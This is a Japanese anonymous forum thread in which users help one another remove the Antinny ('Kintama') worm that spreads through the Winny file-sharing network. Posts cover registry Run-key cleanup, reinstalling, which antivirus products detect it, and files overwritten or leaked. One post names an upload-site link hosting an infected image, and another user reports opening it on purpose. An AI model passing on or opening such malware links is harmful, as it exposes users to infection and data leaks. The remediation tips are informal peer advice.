ちなみにレジストリを戻すってどうするんでしょ？
いまヘルプとサポートで、windowsレジストリとか見て、レジストリの修復の項目見たいんだけど、
関連項目のとこ開かなくなっちゃったよ

>>874
フォーマットした後で起動ディスクから起動→リカバリＣＤって出来るのかなぁ……

>>875
持ってきたレジストリエディタを起動
HKEY_LOCAL_MACHINEの横の＋をクリック
その下にあるSOFTWAREの横の＋を
Microsoft同文
Windows同
CurrentVersionどう
Runど

そこまで行ったら怪しいのを削除

>>876
> フォーマットした後で起動ディスクから起動→リカバリＣＤって出来るのかなぁ……

それが出来なければ リカバリＣＤが存在する意味が無い。
今のＰＣは ＣＤからの直接起動が殆どだけど。
それと リカバリすると自動でＣドライブがフォーマットされる物もあるし、
物によってはＤドライブなどのパーテーションそのものまで工場出荷時の状態にされてしまう物もあるので
必ず取り説を読んでからリカバリした方がいい。

>>877
了解
取り説がないのでバックアップしてからリカバリしますわ

>>876
なるほど
そんな作業Winnyウィルス（通称キンタマ）で見たけど、そのことだったんだ
一応見たけど、怪しいものは・・・ってディスクから引っ張ってきたばっかだったなそういや

>>879
ディスクから引っ張ってきたものはレジストリ「エディタ」であってレジストリじゃないよ

>>867を見るとバスターを使ったとあるので、バスターがレジストリを正常に修正した可能性はもちろんある

>>880
みてるとこが違ってました　ｽﾏｿ
怪しいものを調べ中
/logon /start /autorun /startup が怪しいってサイトに載ってたけど、他にはあります？

>>882
あるかも知れないしないかも知れない
何より、サイトに従って確実に駆除したはずなのに先ほどＤＬＬやその他がぬるぽに書き替えられたという実績がある
確実な対策なんかとても言えないよ
とりあえず漏れと一緒に再インスコでもせんか？

やべ！
ぬるぽどっかでみたぞ！
>>883同様再インスコにむかってるな＿|￣|○　もうすこし粘るけど
これから出なきゃいかんから続きは夜です
とりあえず今までの皆様のお心遣いに感謝
ではのちほど　ﾉｼ

行ってらっしゃい
ＤＬＬの破壊が既に起こってるなら、どのみち再インスコになると思うよ
ＤＬＬを戻さないとまともに動かないソフトが多いでしょ

はい遅くなりました
再び再検査、レジストリも除いてみたのですが検知なし、怪しいのはなしでした
ただ、表示いじってから見れるようになったwinnyのupフォルダにわけわからんタイトルのテキストだったり
gifがあるんだけど、なにこれ？

あとregedt32.exeがNotepadってのも書き換えなきゃ駄目なんだよな
ディスクにゃないけど・・・

regedt32.exeがNotepadのやつだったんだが、2ケタくらい消したり復活したりを
繰り返したら、Registry Editor Utilityに戻ったんだけど、なんで？
そのアイコンクリックするとちゃんんとレジストリエディタひらいた　ﾜｹﾜｶﾒ

「でっかいキンタマ」は見た眼はとてもインパクトがあります。
でっかいキンタマをもつ男性はいやおうでも、自分の睾丸の異常に気がつくでしょう。

キンタマがでっかくなる病気で有名なのは、象皮病でしょう。足や睾丸が何十倍にもなる病気です。
ただ、寄生虫による病気です。アジアやアフリカの一部を除けば、現在は感染することなどありません。

やられました。
ノードファイルとかの中身が全部ぬるぽになってる。
exe踏んだ覚えはないし、eTrust入れてるし、今トレンドマイクロのオンラインスキャンやっても
なにも出てこないけどregeditはNotepadになってます。

明日はヒマがないんで再インストールは来週かなあ。
これって他になにかやばいことしますか？

ACCSメールはあと3週間くらいは儚いのでは？
当分大丈夫だから気にしないで(･∀･)ｲｲ!!

>>890
感染経路が気になるね

結構ヤバそうだったので、再インストールしました。
ny関連だけでなく、txt全般がやられてました。140個ぐらい。
249KBなのに開くとぬるぽだけ。

火曜あたりから終了が異常に遅かったんですが、書き換えてたのかな。
で、土曜日にｎｙが起動しなくなりました。

>>893
むしろ運が良かったくらいだｗ
漏れは1000以上のファイルがぬるぽに書き換えられたよ・・・

キンタマって最新のノートンでなら駆除できるんですか？

>>894
気づいたのはtxtだけだったんですが、他のファイルも
やられたりしましたか？

これってキンタマとは別物ですよね。
勝手にupされてもいないし、そもそも初期ノード潰してくるし。
>>890でも書きましたが、アンチウィルスに反応してないのは
新しい亜種ってことか。

亜種たくさんあるからな

【警報】Winnyを狙ったワーム・ウイルス情報 Part19
http://tmp3.2ch.net/test/read.cgi/download/1084036887/

消えちゃった？

>>898
鯖と共に逝きマスタ

>>896
dllや各種書庫ファイル、DOCやら、いろいろやられたよ

【警報】Winnyを狙ったワーム・ウイルス情報 Part20
http://tmp3.2ch.net/test/read.cgi/download/1084808432/

今みたら更新されてた。
http://www.virusbtn.com/resources/vgrep/vgrep.cgi?terms=antinny&product=15

久々に亜種の登場
http://www.symantec.com/region/jp/sarcj/data/t/trojan.upbit.html

キンキンキン！♪　キキンガキン！♪

おい、キンタマに対応してるアンチウィルスソフトってノートンとバスターだけか？

アンラボのは対応してたよ
亜種まではシラネ

ｎ

age

>>892
フォルダ偽装を踏んだんじゃないかな？
Webでも踏む危険がある＜らしい＞が、これは怖いね。

>>905
avast!で検知経験あり。
Win32:Antinny-B [Wrm]

マカフィはキンタマ対応してないのかよ。。。
やっぱマカフィは糞だな。。。

>>867以降と重複する部分もありますが、キンタマで被害に遭い、上書きされて
しまったtxtのregeditを友達にもらった正常なregeditで上書きしてみても、すぐに
txtのregeditが復活してしまい、正常な方のregeditは消えてしまいます。
これはどういう現象なんでしょうか？

ちなみに本体の削除は感染ファイルの修復はノートン先生で完了、改変された
レジストリキーも、友達からもらった正常なファイルからエディタを起動して
削除しました。
情報の漏洩も防げたものの、大量の動画・画像・音楽ファイルやアプリの実行
ファイルなどがtxtに上書きされてしまい、また、ここ2,3年の思い出のデジカメ
写真なども上書きされてしまって、かなり辛いです(;´Д｀)

>>913
dllchaceというフォルダ（Windowsのシステムファイルが書き換えられた時にｺｲﾂの中にあるのをコピーする）
のregedit.exe自体を直したまえ

下行は
バックアップ取ってなかった君が悪い

あぼーん

Antinny.Qって無料ソフトで駆除できますか？

>916
オンラインスキャンでも使ってろ

>>917
オンラインスキャンしてみたが、ノートンだけしか検出されませんでした。
その他のオンラインスキャンは検出さえしませんでした。
ノートンのやつは、駆除はしてくれないんだよなー。
参った参った・・・

>>918
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.antinny.q.html
実行されていないのならエクスプローラ等で単に削除。
実行されているのなら上記データでレジストリ改変箇所の削除も必要。

検出されたファイルを捨てたら、症状は消えました。
（起動度にTempファイルに数百メガのデータが勝手に制作される、など）
一応、再びオンラインスキャンしたところ「安全です」と出ました。
相談を受けてくださり、ありがとうございました。

>>920
「検出されたファイルを捨てたら、症状は消えました。」
ということは実行されていたのかな？一応レジストリの改変確認を強くお勧めします。

>>921
レジストリ改変箇所の削除をしていなかったので、今、削除しました。
色々とありがとうございました。

不注意でhttp://sakots.pekori.jp/cgi/sn/
ここのup3806.jpgを踏んでしまって､キンタマ感染(´･ω･`)
ノートンでスキャンしましたが､検出はされませんでした｡
削除方法に載ってる症状も出てないみたいなので､大丈夫と見ていいのかな？

>>923
ダウンロードと同時に警告が表示されて自動的に削除されたのなら大丈夫。
jpgを実行して開いてしまっていたらアウト。
直接ロダのjpgを開いてもDL後にテンプに送り込まれてから、
実行という形になると思うからその時に警告が発動されてればセーフ。
詳しくはログを確認して削除された場所や状態を確認してみてください。

W32.HLLW.Antinny
ttp://www.symantec.co.jp/region/jp/sarcj/data/w/w32.hllw.antinny.html

>>924
開いた瞬間警告が出て､ﾌｧｲﾙにｱｸｾｽ不可→削除できません｡ と出ましたが

W32.HLLW.Antinny
ttp://www.symantec.co.jp/region/jp/sarcj/data/w/w32.hllw.antinny.html

↑のﾃｸﾆｶﾙﾉｰﾄに書いてある偽ｴﾗｰﾒｯｾｰｼﾞはありませんでした｡
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runにも
あやしいのは追加されてないです｡ 実行されたのかな･･･

>>925
それなら多分実行されていない（レジストリも開けたようだし）。
ファイル削除でOK。

>>926
そうですか〜安心して床に就けます｡
レスありがとうございました("｀д´)ゞ

ためしに踏んでみたけど、eTrustで防げた。

(´-`).｡ｏO(ためしに踏んで気がつかずに感染してたらどうするんだろう・・・・・・・・・)

nnyでルパン３世とかいう動画が勝手に落ちてたから
開けて見てみたら誰かの旅行の時の写真とWordで書いた
手紙が入ってたよ

すぐに削除したけどこれで住所とか名前ついてたら悲惨だな

>>930
キンタマ犠牲者のファイルを同梱したんだな。
デスクトップにはなにも置けないや。

でさでさ、うｐされるユーザ名はOSのかな？
それともプロファイルのユーザ名かな？

自己レス
間違いなくプロファイルだな。考えたらデスクトップの属性はプロファイルだ。

つか、亜種はデスクトップにおこうがおくまいが関係ないんだろ？

>>933
関係ないんかい？

北海道(庁)が、キンタマウィルスについて
「可能な限りの対策を講じても、データ流出を予見できない」
と主張しております。
http://news13.2ch.net/test/read.cgi/newsplus/1089621066/l50

感染者です。自分のファイルの中に自分のデスクトップの
キャプチャ画像jpgがいきなり出てきました。　oｒｚ
大したデータないんでリカバリ使ってパソコン購入時の設定に戻そうと思うんだけど
そうすればさすがにキンタマを駆除できますか？

戻せるよ
がんばれ

>>936
どのフォルダに入っていたの？

>>936
>自分のファイルの中に自分のデスクトップの
>キャプチャ画像jpg
保存してて忘れたんじゃないの？
慌てずに状況観察を。